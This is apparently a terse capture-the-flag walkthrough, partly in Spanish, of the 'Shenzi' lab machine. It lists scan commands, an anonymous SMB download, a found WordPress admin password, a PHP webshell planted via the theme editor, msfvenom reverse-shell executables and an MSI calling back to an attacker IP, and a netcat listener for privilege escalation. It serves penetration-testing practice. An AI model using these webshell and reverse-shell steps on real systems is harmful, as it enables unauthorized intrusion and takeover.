nmap -A -p- -oA shenzi 192.168.234.55 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA shenzi 192.168.234.55

nmap -sU -O -p- -oA shenzi-udp 192.168.234.55

nikto -h 192.168.234.55:80

Pasted image 20210920085224.png

Pasted image 20210920085716.png

whatweb 192.168.234.55

Pasted image 20210920090741.png

smbclient //192.168.234.55/Shenzi -N

recurse

prompt off

mget *

Pasted image 20210920090425.png

cat password.txt

Pasted image 20210920091527.png

http://192.168.234.55/shenzi/

Pasted image 20210920091414.png

http://192.168.234.55/shenzi/wp-admin/ admin:FeltHeadwallWight357

Pasted image 20210920091653.png

Nos dirigimos a Appearance > Theme editor y modificamos el archivo 404.php

https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.234 LPORT=445 -f exe > shenzi_reverse.exe

Pasted image 20210920102136.png

Subimos el archivo y le damos click en execute

Pasted image 20210920150955.png

Podemos ver que se pueden crear archivos msi para en el sistema despues de correr winPEASany.exe

Pasted image 20210920102107.png

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.234 LPORT=445 -f msi > privesc.msi

Pasted image 20210920121729.png

privesc.msi

nc -lvnp 445

Pasted image 20210920121656.png

boxes

copyright©2022 Cu3rv0x all rights reserved